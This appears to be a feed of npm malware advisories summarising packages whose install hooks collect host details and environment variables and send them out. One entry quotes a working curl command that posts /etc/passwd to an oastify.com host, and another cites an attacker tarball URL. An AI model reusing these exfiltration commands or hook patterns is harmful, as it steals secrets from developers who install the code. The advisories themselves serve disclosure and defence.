Malicious code in grateful-checkout (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector c2a9600ad3ee3fddd9f06425260c94edf660263800080787155a63d3e5212d12 On npm install, the postinstall hook in src/canary.js performs a DNS lookup and an HTTPS GET to a serveo tunnel host...

Malicious code in grateful-payments (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 1a7a07a0a09ed8037058353b9b9b067e25e3cbe783eaab8d54276d490f823471 On npm install, the package's postinstall script src/canary.js performs a DNS lookup and HTTPS GET to the hardcoded host...

Malicious code in @klapp-otp/routes (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 9246974efd1a626094dd3f2027df2e8f1468ce45ebcba42e5207a06c5c9e16ee On npm install, this package auto-executes index.js via the preinstall lifecycle hook. The script collects os.hostname, os.userInfo, dirname,...

Malicious code in @payment-review/store (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 2d624eaefbb0245bf0c9a7b598c461a3ba5ec48005cfec223898062741ef8c2e package.json declares preinstall: node index.js || true, so installing the package automatically runs index.js on npm install. The script collects ho...

Malicious code in @card-pci-data/store (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 9a82d7b7e7588c4b773e2948eb1707e62f2fcece2bec37a23eda5d5058eae871 On npm install, the package's preinstall hook scripts.preinstall: node index.js || true runs index.js which collects host identity — os.hostname,...

MAL-2026-5407 Malicious code in @card-pci-data/store (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 9a82d7b7e7588c4b773e2948eb1707e62f2fcece2bec37a23eda5d5058eae871 On npm install, the package's preinstall hook scripts.preinstall: node index.js || true runs index.js which collects host identity — os.hostname,...

Malicious code in o3forms (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 4d094d4429f1492bb6b99d802de86b97dc972e06d680a1287846e6d1635fe457 The package name impersonates the OpenMRS O3 forms ecosystem legitimate packages are published under the @openmrs/ scope. package.json declares an...

MAL-2026-5454 Malicious code in ui-ng-components (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 198750c8e5d6f4d8a3f3f788a2fd9286f43b5a447bb0e3495b50663c44ddd2a7 Package [email protected] is an empty shell index.js exports , no author, no description, no functionality with a single dependency declared as...

MAL-2026-5453 Malicious code in tivo-codelib-a (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 2c187e845e4c0d637709021a287c758e0206cb7adc46517391df4724d8af8cb7 [email protected] is an empty-stub npm package whose index.js exports module.exports = and whose package metadata description, author is blank. I...

MAL-2026-5431 Malicious code in @webd-infra/query-designer-domain (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 1c7713f23c6a0044172532693bc43aee0d785a980fc5c83ba1f773af9082e3b3 The package's package.json declares its only dependency ltidisafe as a direct tarball URL:...

MAL-2026-5433 Malicious code in @webda-infra/search (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 1d3966598d25bae6a0824df09461ccbea8ad8ff22be2b3b93eab681cc733ff73 @webda-infra/[email protected] is a near-empty placeholder index.js is empty, module.exports = whose package.json declares a single dependency, ltidisafe...

Malicious code in corporate-front-vue (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector d26a235f294aacb3800465f89db0f33ecb54f09da450ee98543f8b039249fc12 [email protected] is a near-empty shim index.js exports an empty object whose only meaningful content is a tarball-URL dependency declared i...

Exploit for CVE-2026-46395

CVE-2026-46395 - HAXcms Node.js Private Key Disclosure via Bro...

Malicious code in @shell-cabinet/routes (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector b385f020626d8bad774fe5ebd776683b547bea4edef85944af658fd0155924ad On npm install, the package's postinstall hook runs curl --data '@/etc/passwd' $hostname.200hj786m7x4kfz1lkr4kmshu80zoqcf.oastify.com, posting the...

Malicious code in @easy-entry/landing-routes (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 16fd1aa3384490a5c01cbdc619bb61ea5fc70f853c8e8ed2e9836d2ca4617556 On npm install, the package's postinstall hook runs two exfiltration paths against an attacker-controlled Burp Collaborator endpoint. First,...

MAL-2026-5430 Malicious code in @sourceflow-uk/sourceflow-tracker (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector c5bcccc37c380ce54f5bfc2bc2311fbefb6ebc3400a397cbc4afc2188fb3c11d package.json declares a dependency ltidisafe whose version specifier is the raw URL https://storage.googleapis.com/lscunpentest/packuxfoundry.tgz — a...

MAL-2026-5405 Malicious code in comos-sdk (npm)

--- -= Per source details. Do not edit below this line.=- Source: ghsa-malware ee12368f5942eae69ed49370445277dace5431f4ded5556b51dcd1ef34bd4b4a Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be...

MAL-2026-5385 Malicious code in @0xlr/clerk-auth (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 2ff421a5ccb412fd8455e89a1b9875b427ed34af12fa4b188ed4418cd8f52a74 On npm install, postinstall.js enumerates the entire process environment Object.keysprocess.env.sort.forEach along with hostname, username, home...

Malicious code in @0xlr/prisma-client-js (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector b993c29d90c2ecfffaa9ed55b99c38e5351052e619b79ad2a385d6c72376f0f4 On npm install, postinstall.js enumerates all of process.env, collects hostname, username, homedir, cwd, argv, platform/arch/release, memory and CPU...

MAL-2026-5386 Malicious code in @0xlr/prisma-client-js (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector b993c29d90c2ecfffaa9ed55b99c38e5351052e619b79ad2a385d6c72376f0f4 On npm install, postinstall.js enumerates all of process.env, collects hostname, username, homedir, cwd, argv, platform/arch/release, memory and CPU...